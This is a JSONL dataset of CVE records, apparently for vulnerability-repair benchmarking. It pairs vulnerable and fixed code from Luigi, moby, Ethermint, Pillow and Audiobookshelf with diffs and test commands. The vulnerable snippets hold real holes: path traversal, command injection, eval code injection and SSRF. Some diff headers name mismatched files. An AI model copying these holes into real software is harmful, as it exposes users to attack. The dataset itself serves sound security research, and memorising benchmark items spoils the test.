Defaults to False.\n\n Raises:\n RuntimeError: If a path traversal attempt is detected.\n \"\"\"\n with tarfile.open(tar_path, 'r') as tar:\n for member in tar.getmembers():\n member_path = os.path.join(self.path, member.name)\n if not self._is_within_directory(self.path, member_path):\n raise RuntimeError(\"Attempted Path Traversal in Tar File\")\n tar.extractall(self.path, members, numeric_owner=numeric_owner)"}], "vul_patch": "--- a/luigi/contrib/lsf_runner.py\n+++ b/luigi/contrib/lsf_runner.py\n@@ -1,16 +1 @@\n-def extract_packages_archive(work_dir):\n- package_file = os.path.join(work_dir, \"packages.tar\")\n- if not os.path.exists(package_file):\n- return\n-\n- curdir = os.path.abspath(os.curdir)\n-\n- os.chdir(work_dir)\n- tar = tarfile.open(package_file)\n- for tarinfo in tar:\n- tar.extract(tarinfo)\n- tar.close()\n- if '' not in sys.path:\n- sys.path.insert(0, '')\n-\n- os.chdir(curdir)\n+from luigi.safe_extractor import SafeExtractor\n\n--- a/luigi/contrib/sge_runner.py\n+++ b/luigi/contrib/lsf_runner.py\n@@ -1,4 +1,4 @@\n-def _extract_packages_archive(work_dir):\n+def extract_packages_archive(work_dir):\n package_file = os.path.join(work_dir, \"packages.tar\")\n if not os.path.exists(package_file):\n return\n@@ -6,10 +6,8 @@\n curdir = os.path.abspath(os.curdir)\n \n os.chdir(work_dir)\n- tar = tarfile.open(package_file)\n- for tarinfo in tar:\n- tar.extract(tarinfo)\n- tar.close()\n+ extractor = SafeExtractor(work_dir)\n+ extractor.safe_extract(package_file)\n if '' not in sys.path:\n sys.path.insert(0, '')\n \n\n--- /dev/null\n+++ b/luigi/contrib/lsf_runner.py\n@@ -0,0 +1 @@\n+from luigi.safe_extractor import SafeExtractor\n\n--- /dev/null\n+++ b/luigi/contrib/lsf_runner.py\n@@ -0,0 +1,14 @@\n+def _extract_packages_archive(work_dir):\n+ package_file = os.path.join(work_dir, \"packages.tar\")\n+ if not os.path.exists(package_file):\n+ return\n+\n+ curdir = os.path.abspath(os.curdir)\n+\n+ os.chdir(work_dir)\n+ extractor = SafeExtractor(work_dir)\n+ extractor.safe_extract(package_file)\n+ if '' not in sys.path:\n+ sys.path.insert(0, '')\n+\n+ os.chdir(curdir)\n\n--- /dev/null\n+++ b/luigi/contrib/lsf_runner.py\n@@ -0,0 +1,97 @@\n+# -*- coding: utf-8 -*-\n+#\n+# Copyright 2012-2015 Spotify AB\n+#\n+# Licensed under the Apache License, Version 2.0 (the \"License\");\n+# you may not use this file except in compliance with the License.\n+# You may obtain a copy of the License at\n+#\n+# http://www.apache.org/licenses/LICENSE-2.0\n+#\n+# Unless required by applicable law or agreed to in writing, software\n+# distributed under the License is distributed on an \"AS IS\" BASIS,\n+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n+# See the License for the specific language governing permissions and\n+# limitations under the License.\n+#\n+\n+\"\"\"\n+This module provides a class `SafeExtractor` that offers a secure way to extract tar files while\n+mitigating path traversal vulnerabilities, which can occur when files inside the archive are\n+crafted to escape the intended extraction directory.\n+\n+The `SafeExtractor` ensures that the extracted file paths are validated before extraction to\n+prevent malicious archives from extracting files outside the intended directory.\n+\n+Classes:\n+ SafeExtractor: A class to securely extract tar files with protection against path traversal attacks.\n+\n+Usage Example:\n+ extractor = SafeExtractor(\"/desired/directory\")\n+ extractor.safe_extract(\"archive.tar\")\n+\"\"\"\n+\n+import os\n+import tarfile\n+\n+\n+class 
SafeExtractor:\n+ \"\"\"\n+ A class to safely extract tar files, ensuring that no path traversal\n+ vulnerabilities are exploited.\n+\n+ Attributes:\n+ path (str): The directory to extract files into.\n+\n+ Methods:\n+ _is_within_directory(directory, target):\n+ Checks if a target path is within a given directory.\n+\n+ safe_extract(tar_path, members=None, \\\\*, numeric_owner=False):\n+ Safely extracts the contents of a tar file to the specified directory.\n+ \"\"\"\n+\n+ def __init__(self, path=\".\"):\n+ \"\"\"\n+ Initializes the SafeExtractor with the specified directory path.\n+\n+ Args:\n+ path (str): The directory to extract files into. Defaults to the current directory.\n+ \"\"\"\n+ self.path = path\n+\n+ @staticmethod\n+ def _is_within_directory(directory, target):\n+ \"\"\"\n+ Checks if a target path is within a given directory.\n+\n+ Args:\n+ directory (str): The directory to check against.\n+ target (str): The target path to check.\n+\n+ Returns:\n+ bool: True if the target path is within the directory, False otherwise.\n+ \"\"\"\n+ abs_directory = os.path.abspath(directory)\n+ abs_target = os.path.abspath(target)\n+ prefix = os.path.commonprefix([abs_directory, abs_target])\n+ return prefix == abs_directory\n+\n+ def safe_extract(self, tar_path, members=None, *, numeric_owner=False):\n+ \"\"\"\n+ Safely extracts the contents of a tar file to the specified directory.\n+\n+ Args:\n+ tar_path (str): The path to the tar file to extract.\n+ members (list, optional): A list of members to extract. Defaults to None.\n+ numeric_owner (bool, optional): If True, only the numeric owner will be used. Defaults to False.\n+\n+ Raises:\n+ RuntimeError: If a path traversal attempt is detected.\n+ \"\"\"\n+ with tarfile.open(tar_path, 'r') as tar:\n+ for member in tar.getmembers():\n+ member_path = os.path.join(self.path, member.name)\n+ if not self._is_within_directory(self.path, member_path):\n+ raise RuntimeError(\"Attempted Path Traversal in Tar File\")\n+ tar.extractall(self.path, members, numeric_owner=numeric_owner)\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-21542:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/luigi\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2024-21542/bin/python -m pytest hand_test.py test/safe_extractor_test.py -xvs\n", "unit_test_cmd": null} {"cve_id": "CVE-2019-13139", "cve_description": "In Docker before 18.09.4, an attacker who is capable of supplying or manipulating the build path for the \"docker build\" command would be able to gain command execution. An issue exists in the way \"docker build\" processes remote git URLs, and results in command injection into the underlying \"git clone\" command, leading to code execution in the context of the user executing the \"docker build\" command. 
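The moby record beginning above pairs two mitigations, both visible in its fix_func: reject a ref that starts with "-", and pass "--" so git stops option parsing before positional arguments. Transcribed to Python for illustration (the original is Go):

```python
# Illustrative transcription of the two-part hardening in the moby fix:
# refuse option-shaped refs early, and terminate option parsing with "--".
def fetch_args(ref: str, shallow: bool = True) -> list:
    if ref.startswith("-"):
        raise ValueError(f"invalid refspec: {ref}")
    args = ["git", "fetch"]
    if shallow:
        args += ["--depth", "1"]
    return args + ["origin", "--", ref]

print(fetch_args("master"))
# ['git', 'fetch', '--depth', '1', 'origin', '--', 'master']
# fetch_args("--upload-pack=evil") raises ValueError before git ever runs
```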
This occurs because git ref can be misinterpreted as a flag.", "cwe_info": {"CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}}, "repo": "https://github.com/moby/moby", "patch_url": ["https://github.com/moby/moby/commit/a588898f99d697e5ff481ecb3b273f45410f10e6"], "programing_language": "Go", "vul_func": [{"id": "vul_go_176_1", "commit": "639880e", "file_path": "builder/remotecontext/git/gitutils.go", "start_line": 78, "end_line": 106, "snippet": "func parseRemoteURL(remoteURL string) (gitRepo, error) {\n\trepo := gitRepo{}\n\n\tif !isGitTransport(remoteURL) {\n\t\tremoteURL = \"https://\" + remoteURL\n\t}\n\n\tvar fragment string\n\tif strings.HasPrefix(remoteURL, \"git@\") {\n\t\t// git@.. is not an URL, so cannot be parsed as URL\n\t\tparts := strings.SplitN(remoteURL, \"#\", 2)\n\n\t\trepo.remote = parts[0]\n\t\tif len(parts) == 2 {\n\t\t\tfragment = parts[1]\n\t\t}\n\t\trepo.ref, repo.subdir = getRefAndSubdir(fragment)\n\t} else {\n\t\tu, err := url.Parse(remoteURL)\n\t\tif err != nil {\n\t\t\treturn repo, err\n\t\t}\n\n\t\trepo.ref, repo.subdir = getRefAndSubdir(u.Fragment)\n\t\tu.Fragment = \"\"\n\t\trepo.remote = u.String()\n\t}\n\treturn repo, nil\n}"}, {"id": "vul_go_176_2", "commit": "639880e", "file_path": "builder/remotecontext/git/gitutils.go", "start_line": 120, "end_line": 128, "snippet": "func fetchArgs(remoteURL string, ref string) []string {\n\targs := []string{\"fetch\"}\n\n\tif supportsShallowClone(remoteURL) {\n\t\targs = append(args, \"--depth\", \"1\")\n\t}\n\n\treturn append(args, \"origin\", ref)\n}"}], "fix_func": [{"id": "fix_go_176_1", "commit": "a588898", "file_path": "builder/remotecontext/git/gitutils.go", "start_line": 78, "end_line": 111, "snippet": "func parseRemoteURL(remoteURL string) (gitRepo, error) {\n\trepo := gitRepo{}\n\n\tif !isGitTransport(remoteURL) {\n\t\tremoteURL = \"https://\" + remoteURL\n\t}\n\n\tvar fragment string\n\tif strings.HasPrefix(remoteURL, \"git@\") {\n\t\t// git@.. 
is not an URL, so cannot be parsed as URL\n\t\tparts := strings.SplitN(remoteURL, \"#\", 2)\n\n\t\trepo.remote = parts[0]\n\t\tif len(parts) == 2 {\n\t\t\tfragment = parts[1]\n\t\t}\n\t\trepo.ref, repo.subdir = getRefAndSubdir(fragment)\n\t} else {\n\t\tu, err := url.Parse(remoteURL)\n\t\tif err != nil {\n\t\t\treturn repo, err\n\t\t}\n\n\t\trepo.ref, repo.subdir = getRefAndSubdir(u.Fragment)\n\t\tu.Fragment = \"\"\n\t\trepo.remote = u.String()\n\t}\n\n\tif strings.HasPrefix(repo.ref, \"-\") {\n\t\treturn gitRepo{}, errors.Errorf(\"invalid refspec: %s\", repo.ref)\n\t}\n\n\treturn repo, nil\n}"}, {"id": "fix_go_176_2", "commit": "a588898", "file_path": "builder/remotecontext/git/gitutils.go", "start_line": 125, "end_line": 133, "snippet": "func fetchArgs(remoteURL string, ref string) []string {\n\targs := []string{\"fetch\"}\n\n\tif supportsShallowClone(remoteURL) {\n\t\targs = append(args, \"--depth\", \"1\")\n\t}\n\n\treturn append(args, \"origin\", \"--\", ref)\n}"}], "vul_patch": "--- a/builder/remotecontext/git/gitutils.go\n+++ b/builder/remotecontext/git/gitutils.go\n@@ -25,5 +25,10 @@\n \t\tu.Fragment = \"\"\n \t\trepo.remote = u.String()\n \t}\n+\n+\tif strings.HasPrefix(repo.ref, \"-\") {\n+\t\treturn gitRepo{}, errors.Errorf(\"invalid refspec: %s\", repo.ref)\n+\t}\n+\n \treturn repo, nil\n }\n\n--- a/builder/remotecontext/git/gitutils.go\n+++ b/builder/remotecontext/git/gitutils.go\n@@ -5,5 +5,5 @@\n \t\targs = append(args, \"--depth\", \"1\")\n \t}\n \n-\treturn append(args, \"origin\", ref)\n+\treturn append(args, \"origin\", \"--\", ref)\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-35936", "cve_description": "Ethermint is an Ethereum library. In Ethermint running versions before `v0.17.2`, the contract `selfdestruct` invocation permanently removes the corresponding bytecode from the internal database storage. However, due to a bug in the `DeleteAccount`function, all contracts that used the identical bytecode (i.e shared the same `CodeHash`) will also stop working once one contract invokes `selfdestruct`, even though the other contracts did not invoke the `selfdestruct` OPCODE. This vulnerability has been patched in Ethermint version v0.18.0. The patch has state machine-breaking changes for applications using Ethermint, so a coordinated upgrade procedure is required. A workaround is available. If a contract is subject to DoS due to this issue, the user can redeploy the same contract, i.e. with identical bytecode, so that the original contract's code is recovered. 
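The moby patch in the CVE-2019-13139 record above layers two defenses: parseRemoteURL rejects refs with a leading '-', and fetchArgs inserts '--' so git stops option parsing before the ref (without it, a ref such as --upload-pack=<cmd> is consumed as a flag by the underlying git fetch). A minimal Python sketch of the same pattern; the fetch_ref helper name is illustrative, not moby code:

import subprocess

def fetch_ref(repo_dir, remote, ref):
    # Refuse refs that could be parsed as options, mirroring the Go fix.
    if ref.startswith("-"):
        raise ValueError("invalid refspec: %s" % ref)
    # '--' marks the end of options; everything after it is an operand.
    subprocess.run(["git", "fetch", "--depth", "1", remote, "--", ref],
                   cwd=repo_dir, check=True)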
The new contract deployment restores the `bytecode hash -> bytecode` entry in the internal state.", "cwe_info": {"CWE-668": {"name": "Exposure of Resource to Wrong Sphere", "description": "The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource."}}, "repo": "https://github.com/evmos/ethermint", "patch_url": ["https://github.com/evmos/ethermint/commit/144741832007a26dbe950512acbda4ed95b2a451"], "programing_language": "Go", "vul_func": [{"id": "vul_go_58_2", "commit": "bead29c", "file_path": "x/evm/keeper/statedb.go", "start_line": 181, "end_line": 221, "snippet": "func (k *Keeper) DeleteAccount(ctx sdk.Context, addr common.Address) error {\n\tcosmosAddr := sdk.AccAddress(addr.Bytes())\n\tacct := k.accountKeeper.GetAccount(ctx, cosmosAddr)\n\tif acct == nil {\n\t\treturn nil\n\t}\n\n\t// NOTE: only Ethereum accounts (contracts) can be selfdestructed\n\tethAcct, ok := acct.(ethermint.EthAccountI)\n\tif !ok {\n\t\treturn sdkerrors.Wrapf(types.ErrInvalidAccount, \"type %T, address %s\", acct, addr)\n\t}\n\n\t// clear balance\n\tif err := k.SetBalance(ctx, addr, new(big.Int)); err != nil {\n\t\treturn err\n\t}\n\n\t// remove code\n\tcodeHashBz := ethAcct.GetCodeHash().Bytes()\n\tif !bytes.Equal(codeHashBz, types.EmptyCodeHash) {\n\t\tk.SetCode(ctx, codeHashBz, nil)\n\t}\n\n\t// clear storage\n\tk.ForEachStorage(ctx, addr, func(key, _ common.Hash) bool {\n\t\tk.SetState(ctx, addr, key, nil)\n\t\treturn true\n\t})\n\n\t// remove auth account\n\tk.accountKeeper.RemoveAccount(ctx, acct)\n\n\tk.Logger(ctx).Debug(\n\t\t\"account suicided\",\n\t\t\"ethereum-address\", addr.Hex(),\n\t\t\"cosmos-address\", cosmosAddr.String(),\n\t)\n\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_58_2", "commit": "1447418", "file_path": "x/evm/keeper/statedb.go", "start_line": 180, "end_line": 214, "snippet": "func (k *Keeper) DeleteAccount(ctx sdk.Context, addr common.Address) error {\n\tcosmosAddr := sdk.AccAddress(addr.Bytes())\n\tacct := k.accountKeeper.GetAccount(ctx, cosmosAddr)\n\tif acct == nil {\n\t\treturn nil\n\t}\n\n\t// NOTE: only Ethereum accounts (contracts) can be selfdestructed\n\t_, ok := acct.(ethermint.EthAccountI)\n\tif !ok {\n\t\treturn sdkerrors.Wrapf(types.ErrInvalidAccount, \"type %T, address %s\", acct, addr)\n\t}\n\n\t// clear balance\n\tif err := k.SetBalance(ctx, addr, new(big.Int)); err != nil {\n\t\treturn err\n\t}\n\n\t// clear storage\n\tk.ForEachStorage(ctx, addr, func(key, _ common.Hash) bool {\n\t\tk.SetState(ctx, addr, key, nil)\n\t\treturn true\n\t})\n\n\t// remove auth account\n\tk.accountKeeper.RemoveAccount(ctx, acct)\n\n\tk.Logger(ctx).Debug(\n\t\t\"account suicided\",\n\t\t\"ethereum-address\", addr.Hex(),\n\t\t\"cosmos-address\", cosmosAddr.String(),\n\t)\n\n\treturn nil\n}"}], "vul_patch": "--- a/x/evm/keeper/statedb.go\n+++ b/x/evm/keeper/statedb.go\n@@ -6,7 +6,7 @@\n \t}\n \n \t// NOTE: only Ethereum accounts (contracts) can be selfdestructed\n-\tethAcct, ok := acct.(ethermint.EthAccountI)\n+\t_, ok := acct.(ethermint.EthAccountI)\n \tif !ok {\n \t\treturn sdkerrors.Wrapf(types.ErrInvalidAccount, \"type %T, address %s\", acct, addr)\n \t}\n@@ -14,12 +14,6 @@\n \t// clear balance\n \tif err := k.SetBalance(ctx, addr, new(big.Int)); err != nil {\n \t\treturn err\n-\t}\n-\n-\t// remove code\n-\tcodeHashBz := ethAcct.GetCodeHash().Bytes()\n-\tif !bytes.Equal(codeHashBz, types.EmptyCodeHash) {\n-\t\tk.SetCode(ctx, codeHashBz, nil)\n \t}\n \n \t// clear storage\n\n", "poc_test_cmd": "#!/bin/bash\n# From 
ghcr.io/anonymous2578-data/cve-2022-35936:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/ethermint\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd ./x/evm/keeper && go test -timeout 30s -testify.m ^TestSuicide$ github.com/evmos/ethermint/x/evm/keeper\n", "unit_test_cmd": null} {"cve_id": "CVE-2023-50447", "cve_description": "Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter).", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/python-pillow/Pillow", "patch_url": ["https://github.com/python-pillow/Pillow/commit/45c726fd4daa63236a8f3653530f297dc87b160a"], "programing_language": "Python", "vul_func": [{"id": "vul_py_347_1", "commit": "c3af2643ddddfc80a509a1060db253e7930c2adc", "file_path": "src/PIL/ImageMath.py", "start_line": 222, "end_line": 260, "snippet": "def eval(expression, _dict={}, **kw):\n \"\"\"\n Evaluates an image expression.\n\n :param expression: A string containing a Python-style expression.\n :param options: Values to add to the evaluation context. You\n can either use a dictionary, or one or more keyword\n arguments.\n :return: The evaluated expression. 
This is usually an image object, but can\n also be an integer, a floating point value, or a pixel tuple,\n depending on the expression.\n \"\"\"\n\n # build execution namespace\n args = ops.copy()\n args.update(_dict)\n args.update(kw)\n for k, v in args.items():\n if hasattr(v, \"im\"):\n args[k] = _Operand(v)\n\n compiled_code = compile(expression, \"\", \"eval\")\n\n def scan(code):\n for const in code.co_consts:\n if type(const) is type(compiled_code):\n scan(const)\n\n for name in code.co_names:\n if name not in args and name != \"abs\":\n msg = f\"'{name}' not allowed\"\n raise ValueError(msg)\n\n scan(compiled_code)\n out = builtins.eval(expression, {\"__builtins\": {\"abs\": abs}}, args)\n try:\n return out.im\n except AttributeError:\n return out"}], "fix_func": [{"id": "fix_py_347_1", "commit": "45c726fd4daa63236a8f3653530f297dc87b160a", "file_path": "src/PIL/ImageMath.py", "start_line": 222, "end_line": 264, "snippet": "def eval(expression, _dict={}, **kw):\n \"\"\"\n Evaluates an image expression.\n\n :param expression: A string containing a Python-style expression.\n :param options: Values to add to the evaluation context. You\n can either use a dictionary, or one or more keyword\n arguments.\n :return: The evaluated expression. This is usually an image object, but can\n also be an integer, a floating point value, or a pixel tuple,\n depending on the expression.\n \"\"\"\n\n # build execution namespace\n args = ops.copy()\n args.update(_dict)\n args.update(kw)\n for k, v in args.items():\n if '__' in k or hasattr(__builtins__, k):\n msg = f\"'{k}' not allowed\"\n raise ValueError(msg)\n\n if hasattr(v, \"im\"):\n args[k] = _Operand(v)\n\n compiled_code = compile(expression, \"\", \"eval\")\n\n def scan(code):\n for const in code.co_consts:\n if type(const) is type(compiled_code):\n scan(const)\n\n for name in code.co_names:\n if name not in args and name != \"abs\":\n msg = f\"'{name}' not allowed\"\n raise ValueError(msg)\n\n scan(compiled_code)\n out = builtins.eval(expression, {\"__builtins\": {\"abs\": abs}}, args)\n try:\n return out.im\n except AttributeError:\n return out"}], "vul_patch": "--- a/src/PIL/ImageMath.py\n+++ b/src/PIL/ImageMath.py\n@@ -16,6 +16,10 @@\n args.update(_dict)\n args.update(kw)\n for k, v in args.items():\n+ if '__' in k or hasattr(__builtins__, k):\n+ msg = f\"'{k}' not allowed\"\n+ raise ValueError(msg)\n+\n if hasattr(v, \"im\"):\n args[k] = _Operand(v)\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-51665", "cve_description": "Audiobookshelf is a self-hosted audiobook and podcast server. Prior to 2.7.0, Audiobookshelf is vulnerable to unauthenticated blind server-side request (SSRF) vulnerability in Auth.js. This vulnerability has been addressed in version 2.7.0. 
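In the Pillow record above (CVE-2023-50447), scanning the compiled expression's co_names constrains only names used in the expression itself, not the keys of the caller-supplied environment, which is why the environment parameter remained exploitable after the expression parameter was locked down in CVE-2022-22817. The fix therefore rejects any environment key that contains '__' or shadows a builtin. A standalone sketch of that key check, using an explicit builtins import so it behaves consistently outside __main__ (the validate_keys name is illustrative, not Pillow's API):

import builtins

def validate_keys(env):
    for key in env:
        # Dunder names can reach object internals; builtin names can shadow
        # functions like abs() that the evaluator deliberately exposes.
        if "__" in key or hasattr(builtins, key):
            raise ValueError(f"'{key}' not allowed")

validate_keys({"a": 1})              # accepted
validate_keys({"exec": object()})    # raises ValueError: shadows a builtin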
There are no known workarounds for this vulnerability.\n\n", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/advplyr/audiobookshelf", "patch_url": ["https://github.com/advplyr/audiobookshelf/commit/728496010cbfcee5b7b54001c9f79e02ede30d82"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_241_1", "commit": "4336714", "file_path": "server/Auth.js", "start_line": 272, "end_line": 376, "snippet": " router.get('/auth/openid', (req, res, next) => {\n try {\n // helper function from openid-client\n function pick(object, ...paths) {\n const obj = {}\n for (const path of paths) {\n if (object[path] !== undefined) {\n obj[path] = object[path]\n }\n }\n return obj\n }\n\n // Get the OIDC client from the strategy\n // We need to call the client manually, because the strategy does not support forwarding the code challenge\n // for API or mobile clients\n const oidcStrategy = passport._strategy('openid-client')\n const protocol = (req.secure || req.get('x-forwarded-proto') === 'https') ? 'https' : 'http'\n\n let mobile_redirect_uri = null\n\n // The client wishes a different redirect_uri\n // We will allow if it is in the whitelist, by saving it into this.openIdAuthSession and setting the redirect uri to /auth/openid/mobile-redirect\n // where we will handle the redirect to it\n if (req.query.redirect_uri) {\n // Check if the redirect_uri is in the whitelist\n if (Database.serverSettings.authOpenIDMobileRedirectURIs.includes(req.query.redirect_uri) ||\n (Database.serverSettings.authOpenIDMobileRedirectURIs.length === 1 && Database.serverSettings.authOpenIDMobileRedirectURIs[0] === '*')) {\n oidcStrategy._params.redirect_uri = new URL(`${protocol}://${req.get('host')}/auth/openid/mobile-redirect`).toString()\n mobile_redirect_uri = req.query.redirect_uri\n } else {\n Logger.debug(`[Auth] Invalid redirect_uri=${req.query.redirect_uri} - not in whitelist`)\n return res.status(400).send('Invalid redirect_uri')\n }\n } else {\n oidcStrategy._params.redirect_uri = new URL(`${protocol}://${req.get('host')}/auth/openid/callback`).toString()\n }\n\n Logger.debug(`[Auth] Oidc redirect_uri=${oidcStrategy._params.redirect_uri}`)\n const client = oidcStrategy._client\n const sessionKey = oidcStrategy._key\n\n let code_challenge\n let code_challenge_method\n\n // If code_challenge is provided, expect that code_verifier will be handled by the client (mobile app)\n // The web frontend of ABS does not need to do a PKCE itself, because it never handles the \"code\" of the oauth flow\n // and as such will not send a code challenge, we will generate then one\n if (req.query.code_challenge) {\n code_challenge = req.query.code_challenge\n code_challenge_method = req.query.code_challenge_method || 'S256'\n\n if (!['S256', 'plain'].includes(code_challenge_method)) {\n return res.status(400).send('Invalid code_challenge_method')\n }\n } else {\n // If no code_challenge is provided, assume a web application flow and generate one\n const code_verifier = OpenIDClient.generators.codeVerifier()\n code_challenge = OpenIDClient.generators.codeChallenge(code_verifier)\n code_challenge_method = 'S256'\n\n // Store the code_verifier in the session for later use in the token exchange\n req.session[sessionKey] = { ...req.session[sessionKey], 
code_verifier }\n }\n\n const params = {\n state: OpenIDClient.generators.random(),\n // Other params by the passport strategy\n ...oidcStrategy._params\n }\n\n if (!params.nonce && params.response_type.includes('id_token')) {\n params.nonce = OpenIDClient.generators.random()\n }\n\n req.session[sessionKey] = {\n ...req.session[sessionKey],\n ...pick(params, 'nonce', 'state', 'max_age', 'response_type'),\n mobile: req.query.redirect_uri, // Used in the abs callback later, set mobile if redirect_uri is filled out\n sso_redirect_uri: oidcStrategy._params.redirect_uri // Save the redirect_uri (for the SSO Provider) for the callback\n }\n\n // We cannot save redirect_uri in the session, because it the mobile client uses browser instead of the API\n // for the request to mobile-redirect and as such the session is not shared\n this.openIdAuthSession.set(params.state, { mobile_redirect_uri: mobile_redirect_uri })\n\n // Now get the URL to direct to\n const authorizationUrl = client.authorizationUrl({\n ...params,\n scope: 'openid profile email',\n response_type: 'code',\n code_challenge,\n code_challenge_method\n })\n\n // params (isRest, callback) to a cookie that will be send to the client\n this.paramsToCookies(req, res)\n\n // Redirect the user agent (browser) to the authorization URL\n res.redirect(authorizationUrl)\n } catch (error) {\n Logger.error(`[Auth] Error in /auth/openid route: ${error}`)\n res.status(500).send('Internal Server Error')\n }\n })"}, {"id": "vul_js_241_2", "commit": "4336714", "file_path": "server/Auth.js", "start_line": 474, "end_line": 495, "snippet": " router.get('/auth/openid/config', async (req, res) => {\n if (!req.query.issuer) {\n return res.status(400).send('Invalid request. Query param \\'issuer\\' is required')\n }\n let issuerUrl = req.query.issuer\n if (issuerUrl.endsWith('/')) issuerUrl = issuerUrl.slice(0, -1)\n\n const configUrl = `${issuerUrl}/.well-known/openid-configuration`\n axios.get(configUrl).then(({ data }) => {\n res.json({\n issuer: data.issuer,\n authorization_endpoint: data.authorization_endpoint,\n token_endpoint: data.token_endpoint,\n userinfo_endpoint: data.userinfo_endpoint,\n end_session_endpoint: data.end_session_endpoint,\n jwks_uri: data.jwks_uri\n })\n }).catch((error) => {\n Logger.error(`[Auth] Failed to get openid configuration at \"${configUrl}\"`, error)\n res.status(error.statusCode || 400).send(`${error.code || 'UNKNOWN'}: Failed to get openid configuration`)\n })\n })"}], "fix_func": [{"id": "fix_js_241_1", "commit": "728496010cbfcee5b7b54001c9f79e02ede30d82", "file_path": "server/Auth.js", "start_line": 272, "end_line": 376, "snippet": " router.get('/auth/openid', (req, res, next) => {\n try {\n // helper function from openid-client\n function pick(object, ...paths) {\n const obj = {}\n for (const path of paths) {\n if (object[path] !== undefined) {\n obj[path] = object[path]\n }\n }\n return obj\n }\n\n // Get the OIDC client from the strategy\n // We need to call the client manually, because the strategy does not support forwarding the code challenge\n // for API or mobile clients\n const oidcStrategy = passport._strategy('openid-client')\n const protocol = (req.secure || req.get('x-forwarded-proto') === 'https') ? 
'https' : 'http'\n\n let mobile_redirect_uri = null\n\n // The client wishes a different redirect_uri\n // We will allow if it is in the whitelist, by saving it into this.openIdAuthSession and setting the redirect uri to /auth/openid/mobile-redirect\n // where we will handle the redirect to it\n if (req.query.redirect_uri) {\n // Check if the redirect_uri is in the whitelist\n if (Database.serverSettings.authOpenIDMobileRedirectURIs.includes(req.query.redirect_uri) ||\n (Database.serverSettings.authOpenIDMobileRedirectURIs.length === 1 && Database.serverSettings.authOpenIDMobileRedirectURIs[0] === '*')) {\n oidcStrategy._params.redirect_uri = new URL(`${protocol}://${req.get('host')}/auth/openid/mobile-redirect`).toString()\n mobile_redirect_uri = req.query.redirect_uri\n } else {\n Logger.debug(`[Auth] Invalid redirect_uri=${req.query.redirect_uri} - not in whitelist`)\n return res.status(400).send('Invalid redirect_uri')\n }\n } else {\n oidcStrategy._params.redirect_uri = new URL(`${protocol}://${req.get('host')}/auth/openid/callback`).toString()\n }\n\n Logger.debug(`[Auth] Oidc redirect_uri=${oidcStrategy._params.redirect_uri}`)\n const client = oidcStrategy._client\n const sessionKey = oidcStrategy._key\n\n let code_challenge\n let code_challenge_method\n\n // If code_challenge is provided, expect that code_verifier will be handled by the client (mobile app)\n // The web frontend of ABS does not need to do a PKCE itself, because it never handles the \"code\" of the oauth flow\n // and as such will not send a code challenge, we will generate then one\n if (req.query.code_challenge) {\n code_challenge = req.query.code_challenge\n code_challenge_method = req.query.code_challenge_method || 'S256'\n\n if (!['S256', 'plain'].includes(code_challenge_method)) {\n return res.status(400).send('Invalid code_challenge_method')\n }\n } else {\n // If no code_challenge is provided, assume a web application flow and generate one\n const code_verifier = OpenIDClient.generators.codeVerifier()\n code_challenge = OpenIDClient.generators.codeChallenge(code_verifier)\n code_challenge_method = 'S256'\n\n // Store the code_verifier in the session for later use in the token exchange\n req.session[sessionKey] = { ...req.session[sessionKey], code_verifier }\n }\n\n const params = {\n state: OpenIDClient.generators.random(),\n // Other params by the passport strategy\n ...oidcStrategy._params\n }\n\n if (!params.nonce && params.response_type.includes('id_token')) {\n params.nonce = OpenIDClient.generators.random()\n }\n\n req.session[sessionKey] = {\n ...req.session[sessionKey],\n ...pick(params, 'nonce', 'state', 'max_age', 'response_type'),\n mobile: req.query.redirect_uri, // Used in the abs callback later, set mobile if redirect_uri is filled out\n sso_redirect_uri: oidcStrategy._params.redirect_uri // Save the redirect_uri (for the SSO Provider) for the callback\n }\n\n // We cannot save redirect_uri in the session, because it the mobile client uses browser instead of the API\n // for the request to mobile-redirect and as such the session is not shared\n this.openIdAuthSession.set(params.state, { mobile_redirect_uri: mobile_redirect_uri })\n\n // Now get the URL to direct to\n const authorizationUrl = client.authorizationUrl({\n ...params,\n scope: 'openid profile email',\n response_type: 'code',\n code_challenge,\n code_challenge_method\n })\n\n // params (isRest, callback) to a cookie that will be send to the client\n this.paramsToCookies(req, res)\n\n // Redirect the user agent (browser) to the 
